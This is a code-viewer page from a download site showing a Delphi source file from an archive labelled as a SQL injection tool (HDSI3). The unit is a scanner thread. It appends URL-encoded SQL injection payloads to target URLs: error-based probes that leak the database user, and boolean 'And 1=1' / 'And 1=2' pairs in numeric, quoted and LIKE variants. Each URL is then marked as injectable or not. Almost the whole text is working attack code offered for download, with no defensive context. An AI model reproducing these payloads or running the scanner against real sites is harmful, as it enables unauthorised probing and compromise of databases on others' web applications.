⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站
📤 上传资源

📄 thread_sclin.pas

📁 sql inject HDSI3--delphi.rar
💻 PAS
字号:
🔍 
unit thread_sclin;

interface

uses
  Classes;

type
  Sclin_Thread = class(TThread)
   FURL:string;
  private
    { Private declarations }
    function IfErrorReport(str_url:string):integer;
    function Inject_method(str_url:string):integer;
  protected
    procedure Execute; override;
  end;

implementation
uses
main_unit,define_unit;

{ Important: Methods and properties of objects in visual components can only be
  used in a method called using Synchronize, for example,

      Synchronize(UpdateCaption);

  and UpdateCaption could look like,

    procedure Sclin_Thread.UpdateCaption;
    begin
      Form1.Caption := 'Updated in a thread';
    end; }

{ Sclin_Thread }

procedure Sclin_Thread.Execute;
begin
  { Place thread code here }
  if form_main.stop_clin=true then exit;
  if IfErrorReport(FURL)>0 then
  Form_main.ListBoxMRe.Items.Add('[是]'+FURL)
  else
    begin
      if Inject_method(FURL)>0   then
        Form_main.ListBoxMRe.Items.Add('[是]'+FURL)
      else
        Form_main.ListBoxMRe.Items.Add('[否]'+FURL);
    end;
end;



//******************************************************************************
//判断注入方式及是否抱错
function Sclin_Thread.IfErrorReport(str_url:string):integer;
var
  str_ext1,str_ext2,str_ext3:string;
begin
  result:=0;
  //cjdatabase_unit.Inject_methord:=0;
  //cjdatabase_unit.Database_methord:=0;
  //根据不同的注入方式构造sql
  str_ext1:='%20and(char(94)%2Buser%2Bchar(94))>0';
  if define_unit.GetURLMsgBool(str_url+str_ext1) then
  begin
      result:=1;

      exit;
  end;
  str_ext2:='''%20and(char(94)%2Buser%2Bchar(94))>0%20and%20''''=''';
  if define_unit.GetURLMsgBool(str_url+str_ext2) then
  begin
      result:=2;

      exit;
  end;
  str_ext3:='%25''%20and(char(94)%2Buser%2Bchar(94))>0%20and%20''%25''=''';
  if define_unit.GetURLMsgBool(str_url+str_ext3) then
  begin
      result:=3;

      exit;
  end;
end;


//******************************************************************************
function Sclin_Thread.Inject_method(str_url:string):integer;
var
  found:integer;
  str_ext1,str_ext2,str_ext3:string;
  str_ext4,str_ext5,str_ext6:string;

begin
  result:=0;
        str_ext1:='%20And%201=1';
       str_ext4:='%20And%201=2';
       if (define_unit.GetURLCode(str_url+str_ext1)=200) and (define_unit.GetURLCode(str_url+str_ext4)=500) then
       begin
            result:=1;
            exit;
       end;
       str_ext2:='''%20And%201=1%20And%20''''=''';
       str_ext5:='''%20And%201=2%20And%20''''=''';
       if (define_unit.GetURLCode(str_url+str_ext2)=200) and (define_unit.GetURLCode(str_url+str_ext5)=500) then
       begin
            result:=2;
            exit;
       end;
       str_ext3:='%25''%20And%201=1%20And%20''%25''=''';
       str_ext6:='%25''%20And%201=2%20And%20''%25''=''';
       if (define_unit.GetURLCode(str_url+str_ext3)=200) and (define_unit.GetURLCode(str_url+str_ext6)=500) then
       begin
            result:=3;
            exit;
       end;


end;
end.

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -